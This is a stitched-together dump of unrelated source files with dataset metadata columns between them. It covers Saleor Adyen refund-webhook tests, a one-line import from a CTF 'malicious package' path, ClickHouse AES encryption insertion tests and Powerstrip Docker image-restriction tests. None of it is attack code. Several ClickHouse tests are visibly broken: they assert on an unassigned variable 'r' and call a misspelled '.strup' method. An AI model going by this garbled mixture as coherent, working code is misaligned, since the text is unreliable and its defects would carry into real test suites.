assert payment.transactions.count() == 1
@mock.patch("saleor.payment.gateways.adyen.webhooks.order_refunded")
def test_handle_refund(
mock_order_refunded, notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.captured_amount = payment.total
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_refund(notification, config)
assert payment.transactions.count() == 1
transaction = payment.transactions.get()
assert transaction.is_success is True
assert transaction.kind == TransactionKind.REFUND
payment.refresh_from_db()
assert payment.charge_status == ChargeStatus.FULLY_REFUNDED
assert payment.captured_amount == Decimal("0.00")
mock_order_refunded.assert_called_once_with(
payment.order, None, transaction.amount, payment
)
@mock.patch("saleor.payment.gateways.adyen.webhooks.order_refunded")
def test_handle_refund_already_refunded(
mock_order_refunded, notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_REFUNDED
payment.captured_amount = Decimal("0.00")
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
create_new_transaction(notification, payment, TransactionKind.REFUND)
config = adyen_plugin().config
handle_refund(notification, config)
assert payment.transactions.count() == 1
assert not mock_order_refunded.called
def test_handle_failed_refund_missing_transaction(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.captured_amount = payment.total
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_failed_refund(notification, config)
assert payment.transactions.count() == 0
def test_handle_failed_refund_with_transaction_refund_ongoing(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.captured_amount = payment.total
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
create_new_transaction(notification, payment, TransactionKind.REFUND_ONGOING)
handle_failed_refund(notification, config)
assert (
payment.transactions.count() == 3
) # REFUND_ONGOING, REFUND_FAILED, FULLY_CHARGED
assert payment.charge_status == ChargeStatus.FULLY_CHARGED
assert payment.total == payment.captured_amount
def test_handle_failed_refund_with_transaction_refund(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_REFUNDED
payment.captured_amount = Decimal("0.0")
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
create_new_transaction(notification, payment, TransactionKind.REFUND)
handle_failed_refund(notification, config)
payment.refresh_from_db()
assert payment.transactions.count() == 3 # REFUND, REFUND_FAILED, FULLY_CHARGED
assert payment.charge_status == ChargeStatus.FULLY_CHARGED
assert payment.total == payment.captured_amount
def test_handle_reversed_refund(notification, adyen_plugin, payment_adyen_for_order):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_REFUNDED
payment.captured_amount = Decimal("0.0")
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_reversed_refund(notification, config)
payment.refresh_from_db()
assert payment.transactions.count() == 1 # REFUND_REVERSED
assert payment.charge_status == ChargeStatus.FULLY_CHARGED
assert payment.total == payment.captured_amount
def test_handle_reversed_refund_already_processed(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.captured_amount = payment.total
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
create_new_transaction(notification, payment, TransactionKind.REFUND_REVERSED)
handle_reversed_refund(notification, config)
payment.refresh_from_db()
assert payment.transactions.count() == 1
def test_webhook_not_implemented(notification, adyen_plugin, payment_adyen_for_order):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.captured_amount = payment.total
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
webhook_not_implemented(notification, config)
assert payment.order.events.count() == 1
@mock.patch("saleor.payment.gateways.adyen.webhooks.handle_refund")
def test_handle_cancel_or_refund_action_refund(
mock_handle_refund, notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
config = adyen_plugin().config
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
notification["additionalData"]["modification.action"] = "refund"
handle_cancel_or_refund(notification, config)
mock_handle_refund.assert_called_once_with(notification, config)
@mock.patch("saleor.payment.gateways.adyen.webhooks.handle_cancellation")
def test_handle_cancel_or_refund_action_cancel(
mock_handle_cancellation, notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
config = adyen_plugin().config
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
notification["additionalData"]["modification.action"] = "cancel"
handle_cancel_or_refund(notification, config)
mock_handle_cancellation.assert_called_once_with(notification, config)
| 35.280876
| 86
| 0.759754
| 2,057
| 17,711
| 6.216334
| 0.060282
| 0.039571
| 0.053961
| 0.071948
| 0.883475
| 0.870337
| 0.85063
| 0.836396
| 0.808243
| 0.792445
| 0
| 0.003149
| 0.157303
| 17,711
| 501
| 87
| 35.351297
| 0.853601
| 0.01931
| 0
| 0.707617
| 0
| 0
| 0.035885
| 0.015495
| 0
| 0
| 0
| 0
| 0.144963
| 1
| 0.056511
| false
| 0
| 0.019656
| 0
| 0.076167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4cf073b1b3e0c119caee67b6c90354caba8cfa8
| 23
|
py
|
Python
|
internal-dependency-ctf/attacker/malicious package/password/__init__.py
|
garcilazor/Software_Supply_Chain_CTF
|
a0cd91d5e72ded132178c3f5868bf78b677316d5
|
[
"MIT"
] | null | null | null |
internal-dependency-ctf/attacker/malicious package/password/__init__.py
|
garcilazor/Software_Supply_Chain_CTF
|
a0cd91d5e72ded132178c3f5868bf78b677316d5
|
[
"MIT"
] | 21
|
2021-08-06T01:42:28.000Z
|
2021-08-08T18:57:40.000Z
|
internal-dependency-ctf/attacker/malicious package/password/__init__.py
|
garcilazor/Software_Supply_Chain_CTF
|
a0cd91d5e72ded132178c3f5868bf78b677316d5
|
[
"MIT"
] | 1
|
2021-09-03T22:24:37.000Z
|
2021-09-03T22:24:37.000Z
|
from password import *
| 11.5
| 22
| 0.782609
| 3
| 23
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 23
| 1
| 23
| 23
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
c4d80c8589624fdc7ed8344cbd227c87087e429d
| 22,995
|
py
|
Python
|
tests/testflows/aes_encryption/tests/compatibility/insert.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | 1
|
2022-02-27T15:21:20.000Z
|
2022-02-27T15:21:20.000Z
|
tests/testflows/aes_encryption/tests/compatibility/insert.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | 16
|
2022-02-14T15:53:29.000Z
|
2022-03-25T18:39:16.000Z
|
tests/testflows/aes_encryption/tests/compatibility/insert.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | null | null | null |
import os
import textwrap
from contextlib import contextmanager
from importlib.machinery import SourceFileLoader
from testflows.core import *
from testflows.core.name import basename
from testflows.asserts.helpers import varname
from testflows.asserts import values, error, snapshot
from aes_encryption.tests.common import modes, mysql_modes
@contextmanager
def table(name):
node = current().context.node
try:
with Given("table"):
sql = f"""
CREATE TABLE {name}
(
date Nullable(Date),
name Nullable(String),
secret Nullable(String)
)
ENGINE = Memory()
"""
with By("dropping table if exists"):
node.query(f"DROP TABLE IF EXISTS {name}")
with And("creating a table"):
node.query(textwrap.dedent(sql))
yield
finally:
with Finally("I drop the table", flags=TE):
node.query(f"DROP TABLE IF EXISTS {name}")
@contextmanager
def mv_transform(table, transform):
node = current().context.node
try:
with Given("tables for input transformation"):
with By("creating Null input table"):
sql = f"""
CREATE TABLE {table}_input
(
date Nullable(Date),
name Nullable(String),
secret Nullable(String),
mode String,
key String,
iv String,
aad String
)
ENGINE=Null()
"""
node.query(textwrap.dedent(sql))
with And("creating materialized view table"):
sql = f"""
CREATE MATERIALIZED VIEW {table}_input_mv TO {table} AS
SELECT date, name, {transform}
FROM {table}_input
"""
node.query(textwrap.dedent(sql))
yield
finally:
with Finally("I drop tables for input transformation", flags=TE):
with By("dropping materialized view table", flags=TE):
node.query(f"DROP TABLE IF EXISTS {table}_input_mv")
with And("dropping Null input table", flags=TE):
node.query(f"DROP TABLE IF EXISTS {table}_input")
@TestScenario
def encrypt_using_materialized_view(self):
"""Check that we can use `encrypt` function when inserting
data into a table using a materialized view for input
data transformation.
"""
node = self.context.node
key = f"{'1' * 36}"
iv = f"{'2' * 16}"
aad = "some random aad"
for mode, key_len, iv_len, aad_len in modes:
with Example(
f"""mode={mode.strip("'")} iv={iv_len} aad={aad_len}"""
) as example:
example_key = f"'{key[:key_len]}'"
example_mode = mode
example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
example_aad = None if not aad_len else f"'{aad}'"
example_transform = f"encrypt(mode, secret, key{', iv' if example_iv else ''}{', aad' if example_aad else ''})"
with table("user_data"):
with mv_transform("user_data", example_transform):
with When("I insert encrypted data"):
node.query(
f"""
INSERT INTO user_data_input
(date, name, secret, mode, key)
VALUES
('2020-01-01', 'user0', 'user0_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""}),
('2020-01-02', 'user1', 'user1_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""}),
('2020-01-03', 'user2', 'user2_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""})
"""
)
with And("I read inserted data back"):
node.query(
"SELECT date, name, hex(secret) FROM user_data ORDER BY date"
)
with Then("output must match the snapshot"):
with values() as that:
assert that(
snapshot(
r.output.strip(),
"insert",
name=f"encrypt_mv_example_{varname(basename(self.name))}",
)
), error()
@TestScenario
def aes_encrypt_mysql_using_materialized_view(self):
"""Check that we can use `aes_encrypt_mysql` function when inserting
data into a table using a materialized view for input
data transformation.
"""
node = self.context.node
key = f"{'1' * 64}"
iv = f"{'2' * 64}"
aad = "some random aad"
for mode, key_len, iv_len in mysql_modes:
with Example(
f"""mode={mode.strip("'")} key={key_len} iv={iv_len}"""
) as example:
example_key = f"'{key[:key_len]}'"
example_mode = mode
example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
example_transform = (
f"aes_encrypt_mysql(mode, secret, key{', iv' if example_iv else ''})"
)
with table("user_data"):
with mv_transform("user_data", example_transform):
with When("I insert encrypted data"):
node.query(
f"""
INSERT INTO user_data_input
(date, name, secret, mode, key)
VALUES
('2020-01-01', 'user0', 'user0_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}),
('2020-01-02', 'user1', 'user1_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}),
('2020-01-03', 'user2', 'user2_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""})
"""
)
with And("I read inserted data back"):
node.query(
"SELECT date, name, hex(secret) FROM user_data ORDER BY date"
)
with Then("output must match the snapshot"):
with values() as that:
assert that(
snapshot(
r.output.strip(),
"insert",
name=f"aes_encrypt_mysql_mv_example_{varname(basename(self.name))}",
)
), error()
@TestScenario
def encrypt_using_input_table_function(self):
"""Check that we can use `encrypt` function when inserting
data into a table using insert select and `input()` table
function.
"""
node = self.context.node
key = f"{'1' * 36}"
iv = f"{'2' * 16}"
aad = "some random aad"
for mode, key_len, iv_len, aad_len in modes:
with Example(
f"""mode={mode.strip("'")} iv={iv_len} aad={aad_len}"""
) as example:
example_key = f"'{key[:key_len]}'"
example_mode = mode
example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
example_aad = None if not aad_len else f"'{aad}'"
example_transform = f"encrypt({mode}, secret, {example_key}{(', ' + example_iv) if example_iv else ''}{(', ' + example_aad) if example_aad else ''})"
with table("user_data"):
with When("I insert encrypted data"):
node.query(
f"""
INSERT INTO
user_data
SELECT
date, name, {example_transform}
FROM
input('date Date, name String, secret String')
FORMAT Values ('2020-01-01', 'user0', 'user0_secret'), ('2020-01-02', 'user1', 'user1_secret'), ('2020-01-03', 'user2', 'user2_secret')
"""
)
with And("I read inserted data back"):
r = node.query(
"SELECT date, name, hex(secret) FROM user_data ORDER BY date"
)
with Then("output must match the snapshot"):
with values() as that:
assert that(
snapshot(
r.output.strip(),
"insert",
name=f"encrypt_input_example_{varname(basename(example.name))}",
)
), error()
@TestScenario
def aes_encrypt_mysql_using_input_table_function(self):
"""Check that we can use `aes_encrypt_mysql` function when inserting
data into a table using insert select and `input()` table
function.
"""
node = self.context.node
key = f"{'1' * 64}"
iv = f"{'2' * 64}"
aad = "some random aad"
for mode, key_len, iv_len in mysql_modes:
with Example(
f"""mode={mode.strip("'")} key={key_len} iv={iv_len}"""
) as example:
example_key = f"'{key[:key_len]}'"
example_mode = mode
example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
example_transform = f"aes_encrypt_mysql({mode}, secret, {example_key}{(', ' + example_iv) if example_iv else ''})"
with table("user_data"):
with When("I insert encrypted data"):
node.query(
f"""
INSERT INTO
user_data
SELECT
date, name, {example_transform}
FROM
input('date Date, name String, secret String')
FORMAT Values ('2020-01-01', 'user0', 'user0_secret'), ('2020-01-02', 'user1', 'user1_secret'), ('2020-01-03', 'user2', 'user2_secret')
"""
)
with And("I read inserted data back"):
r = node.query(
"SELECT date, name, hex(secret) FROM user_data ORDER BY date"
)
with Then("output must match the snapshot"):
with values() as that:
assert that(
snapshot(
r.output.strip(),
"insert",
name=f"aes_encrypt_mysql_input_example_{varname(basename(example.name))}",
)
), error()
@TestScenario
def decrypt_using_materialized_view(self):
"""Check that we can use `decrypt` function when inserting
data into a table using a materialized view for input
data transformation.
"""
node = self.context.node
key = f"{'1' * 36}"
iv = f"{'2' * 16}"
aad = "some random aad"
with Given("I load encrypt snapshots"):
snapshot_module = SourceFileLoader(
"snapshot",
os.path.join(current_dir(), "snapshots", "insert.py.insert.snapshot"),
).load_module()
for mode, key_len, iv_len, aad_len in modes:
with Example(
f"""mode={mode.strip("'")} iv={iv_len} aad={aad_len}"""
) as example:
example_key = f"'{key[:key_len]}'"
example_mode = mode
example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
example_aad = None if not aad_len else f"'{aad}'"
example_transform = f"decrypt(mode, secret, key{', iv' if example_iv else ''}{', aad' if example_aad else ''})"
with Given("I have ciphertexts"):
example_name = basename(example.name)
ciphertexts = getattr(
snapshot_module, varname(f"encrypt_mv_example_{example_name}")
)
example_ciphertexts = [
"'{}'".format(l.split("\t")[-1].strup("'"))
for l in ciphertexts.split("\n")
]
with table("user_data"):
with mv_transform("user_data", example_transform):
with When("I insert encrypted data"):
node.query(
f"""
INSERT INTO user_data_input
(date, name, secret, mode, key)
VALUES
('2020-01-01', 'user0', 'unhex({example_ciphertexts[0]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""}),
('2020-01-02', 'user1', 'unhex({example_ciphertexts[1]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""}),
('2020-01-03', 'user2', 'unhex({example_ciphertexts[2]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""})
"""
)
with And("I read inserted data back"):
r = node.query(
"SELECT date, name, secret FROM user_data ORDER BY date"
)
with Then("output must match the expected"):
expected = r"""'2020-01-01\tuser0\tuser0_secret\n2020-01-02\tuser1\tuser1_secret\n2020-01-03\tuser2\tuser2_secret'"""
assert r.output == expected, error()
@TestScenario
def aes_decrypt_mysql_using_materialized_view(self):
"""Check that we can use `aes_decrypt_mysql` function when inserting
data into a table using a materialized view for input
data transformation.
"""
node = self.context.node
key = f"{'1' * 36}"
iv = f"{'2' * 16}"
aad = "some random aad"
with Given("I load encrypt snapshots"):
snapshot_module = SourceFileLoader(
"snapshot",
os.path.join(current_dir(), "snapshots", "insert.py.insert.snapshot"),
).load_module()
for mode, key_len, iv_len, aad_len in modes:
with Example(
f"""mode={mode.strip("'")} key={key_len} iv={iv_len}"""
) as example:
example_key = f"'{key[:key_len]}'"
example_mode = mode
example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
example_aad = None if not aad_len else f"'{aad}'"
example_transform = (
f"aes_decrypt_mysql(mode, secret, key{', iv' if example_iv else ''})"
)
with Given("I have ciphertexts"):
example_name = basename(example.name)
ciphertexts = getattr(
snapshot_module,
varname(f"aes_encrypt_mysql_mv_example_{example_name}"),
)
example_ciphertexts = [
"'{}'".format(l.split("\t")[-1].strup("'"))
for l in ciphertexts.split("\n")
]
with table("user_data"):
with mv_transform("user_data", example_transform):
with When("I insert encrypted data"):
node.query(
f"""
INSERT INTO user_data_input
(date, name, secret, mode, key)
VALUES
('2020-01-01', 'user0', 'unhex({example_ciphertexts[0]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}),
('2020-01-02', 'user1', 'unhex({example_ciphertexts[1]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}),
('2020-01-03', 'user2', 'unhex({example_ciphertexts[2]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""})
"""
)
with And("I read inserted data back"):
r = node.query(
"SELECT date, name, secret FROM user_data ORDER BY date"
)
with Then("output must match the expected"):
expected = r"""'2020-01-01\tuser0\tuser0_secret\n2020-01-02\tuser1\tuser1_secret\n2020-01-03\tuser2\tuser2_secret'"""
assert r.output == expected, error()
@TestScenario
def decrypt_using_input_table_function(self):
"""Check that we can use `decrypt` function when inserting
data into a table using insert select and `input()` table
function.
"""
node = self.context.node
key = f"{'1' * 36}"
iv = f"{'2' * 16}"
aad = "some random aad"
with Given("I load encrypt snapshots"):
snapshot_module = SourceFileLoader(
"snapshot",
os.path.join(current_dir(), "snapshots", "insert.py.insert.snapshot"),
).load_module()
for mode, key_len, iv_len, aad_len in modes:
with Example(
f"""mode={mode.strip("'")} iv={iv_len} aad={aad_len}"""
) as example:
example_key = f"'{key[:key_len]}'"
example_mode = mode
example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
example_aad = None if not aad_len else f"'{aad}'"
example_transform = f"decrypt({mode}, unhex(secret), {example_key}{(', ' + example_iv) if example_iv else ''}{(', ' + example_aad) if example_aad else ''})"
with Given("I have ciphertexts"):
example_name = basename(example.name)
ciphertexts = getattr(
snapshot_module, varname(f"encrypt_input_example_{example_name}")
)
example_ciphertexts = [
l.split("\\t")[-1].strip("'") for l in ciphertexts.split("\\n")
]
with table("user_data"):
with When("I insert decrypted data"):
node.query(
textwrap.dedent(
f"""
INSERT INTO
user_data
SELECT
date, name, {example_transform}
FROM
input('date Date, name String, secret String')
FORMAT Values ('2020-01-01', 'user0', '{example_ciphertexts[0]}'), ('2020-01-02', 'user1', '{example_ciphertexts[1]}'), ('2020-01-03', 'user2', '{example_ciphertexts[2]}')
"""
)
)
with And("I read inserted data back"):
r = node.query(
"SELECT date, name, secret FROM user_data ORDER BY date"
)
expected = """2020-01-01\tuser0\tuser0_secret\n2020-01-02\tuser1\tuser1_secret\n2020-01-03\tuser2\tuser2_secret"""
with Then("output must match the expected", description=expected):
assert r.output == expected, error()
@TestScenario
def aes_decrypt_mysql_using_input_table_function(self):
"""Check that we can use `aes_decrypt_mysql` function when inserting
data into a table using insert select and `input()` table
function.
"""
node = self.context.node
key = f"{'1' * 64}"
iv = f"{'2' * 64}"
aad = "some random aad"
with Given("I load encrypt snapshots"):
snapshot_module = SourceFileLoader(
"snapshot",
os.path.join(current_dir(), "snapshots", "insert.py.insert.snapshot"),
).load_module()
for mode, key_len, iv_len in mysql_modes:
with Example(
f"""mode={mode.strip("'")} key={key_len} iv={iv_len}"""
) as example:
example_key = f"'{key[:key_len]}'"
example_mode = mode
example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
example_transform = f"aes_decrypt_mysql({mode}, unhex(secret), {example_key}{(', ' + example_iv) if example_iv else ''})"
with Given("I have ciphertexts"):
example_name = basename(example.name)
ciphertexts = getattr(
snapshot_module,
varname(f"aes_encrypt_mysql_input_example_{example_name}"),
)
example_ciphertexts = [
l.split("\\t")[-1].strip("'") for l in ciphertexts.split("\\n")
]
with table("user_data"):
with When("I insert decrypted data"):
node.query(
textwrap.dedent(
f"""
INSERT INTO
user_data
SELECT
date, name, {example_transform}
FROM
input('date Date, name String, secret String')
FORMAT Values ('2020-01-01', 'user0', '{example_ciphertexts[0]}'), ('2020-01-02', 'user1', '{example_ciphertexts[1]}'), ('2020-01-03', 'user2', '{example_ciphertexts[2]}')
"""
)
)
with And("I read inserted data back"):
r = node.query(
"SELECT date, name, secret FROM user_data ORDER BY date"
)
expected = """2020-01-01\tuser0\tuser0_secret\n2020-01-02\tuser1\tuser1_secret\n2020-01-03\tuser2\tuser2_secret"""
with Then("output must match the expected", description=expected):
assert r.output == expected, error()
@TestFeature
@Name("insert")
def feature(self, node="clickhouse1"):
"""Check encryption functions when used during data insertion into a table."""
self.context.node = self.context.cluster.node(node)
for scenario in loads(current_module(), Scenario):
Scenario(run=scenario, flags=TE)
| 42.821229
| 210
| 0.488932
| 2,406
| 22,995
| 4.510391
| 0.0665
| 0.036491
| 0.020273
| 0.023959
| 0.90868
| 0.901309
| 0.901309
| 0.893015
| 0.887947
| 0.853852
| 0
| 0.029608
| 0.39339
| 22,995
| 536
| 211
| 42.901119
| 0.748369
| 0.049228
| 0
| 0.738532
| 0
| 0.050459
| 0.46456
| 0.070004
| 0
| 0
| 0
| 0
| 0.022936
| 1
| 0.025229
| false
| 0
| 0.020642
| 0
| 0.045872
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f225bee7fcdba877120586116dc916494d4d6b5b
| 5,901
|
py
|
Python
|
app/test_priu.py
|
robhaswell/powerstrip-restrict-image-user
|
d6a5dbb19330f1ee5b384095c1010636af12120d
|
[
"Apache-2.0"
] | null | null | null |
app/test_priu.py
|
robhaswell/powerstrip-restrict-image-user
|
d6a5dbb19330f1ee5b384095c1010636af12120d
|
[
"Apache-2.0"
] | null | null | null |
app/test_priu.py
|
robhaswell/powerstrip-restrict-image-user
|
d6a5dbb19330f1ee5b384095c1010636af12120d
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import json as _json
import lib
import priu
class FlaskrTestCase(unittest.TestCase):
def setUp(self):
self.app = priu.app.test_client()
def test_integration_create_user_success(self):
"""
The request is returned unmodified when the user is allowed.
"""
priu.app.config['ALLOWED_USER'] = "good"
path = "/v1.16/containers/create"
json = r'{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"PortSpecs":null,"ExposedPorts":{},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":[],"Cmd":null,"Image":"good/container","Volumes":{},"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"bridge","IpcMode":"","CapAdd":null,"CapDrop":null,"RestartPolicy":{"Name":"","MaximumRetryCount":0},"SecurityOpt":null}}'
request_json = self._make_powerstrip_pre_hook_request("POST", path, json)
expected_json = lib.pre_hook_response("POST", path, json)
rv = self.app.post("/", data=request_json, headers={
"content-type": "application/json"})
self.assertEquals(rv.status_code, 200)
self.assertEquals(rv.data, expected_json)
self.assertEquals(rv.headers['content-type'], "application/json")
def test_integration_create_user_fail(self):
"""
The status code is 403 when the user is bad.
"""
priu.app.config['ALLOWED_USER'] = "good"
path = "/v1.16/containers/create"
json = r'{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"PortSpecs":null,"ExposedPorts":{},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":[],"Cmd":null,"Image":"bad/container","Volumes":{},"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"bridge","IpcMode":"","CapAdd":null,"CapDrop":null,"RestartPolicy":{"Name":"","MaximumRetryCount":0},"SecurityOpt":null}}'
request_json = self._make_powerstrip_pre_hook_request("POST", path, json)
rv = self.app.post("/", data=request_json, headers={
"content-type": "application/json"})
self.assertEquals(rv.status_code, 403)
def test_integration_create_official_success(self):
"""
The request is returned unmodified when the official is allowed.
"""
priu.app.config['ALLOWED_USER'] = "_"
path = "/v1.16/containers/create"
json = r'{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"PortSpecs":null,"ExposedPorts":{},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":[],"Cmd":null,"Image":"container","Volumes":{},"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"bridge","IpcMode":"","CapAdd":null,"CapDrop":null,"RestartPolicy":{"Name":"","MaximumRetryCount":0},"SecurityOpt":null}}'
request_json = self._make_powerstrip_pre_hook_request("POST", path, json)
expected_json = lib.pre_hook_response("POST", path, json)
rv = self.app.post("/", data=request_json, headers={
"content-type": "application/json"})
self.assertEquals(rv.status_code, 200)
self.assertEquals(rv.data, expected_json)
self.assertEquals(rv.headers['content-type'], "application/json")
def test_integration_create_office_fail(self):
"""
The status code is 403 when the user and only official Docker images
are allowed.
"""
priu.app.config['ALLOWED_USER'] = "_"
path = "/v1.16/containers/create"
json = r'{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"PortSpecs":null,"ExposedPorts":{},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":[],"Cmd":null,"Image":"bad/container","Volumes":{},"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"bridge","IpcMode":"","CapAdd":null,"CapDrop":null,"RestartPolicy":{"Name":"","MaximumRetryCount":0},"SecurityOpt":null}}'
request_json = self._make_powerstrip_pre_hook_request("POST", path, json)
rv = self.app.post("/", data=request_json, headers={
"content-type": "application/json"})
self.assertEquals(rv.status_code, 403)
def _make_powerstrip_pre_hook_request(self, method, path, json):
"""
Format a Powerstrip pre-hook request JSON blob.
"""
return _json.dumps(dict(
PowerstripProtocolVersion=1,
Type="pre-hook",
ClientRequest=dict(
Method=method,
Request=path,
Body=json,
)))
if __name__ == '__main__':
unittest.main()
| 64.846154
| 749
| 0.657516
| 643
| 5,901
| 5.912908
| 0.191291
| 0.021042
| 0.037875
| 0.037875
| 0.897685
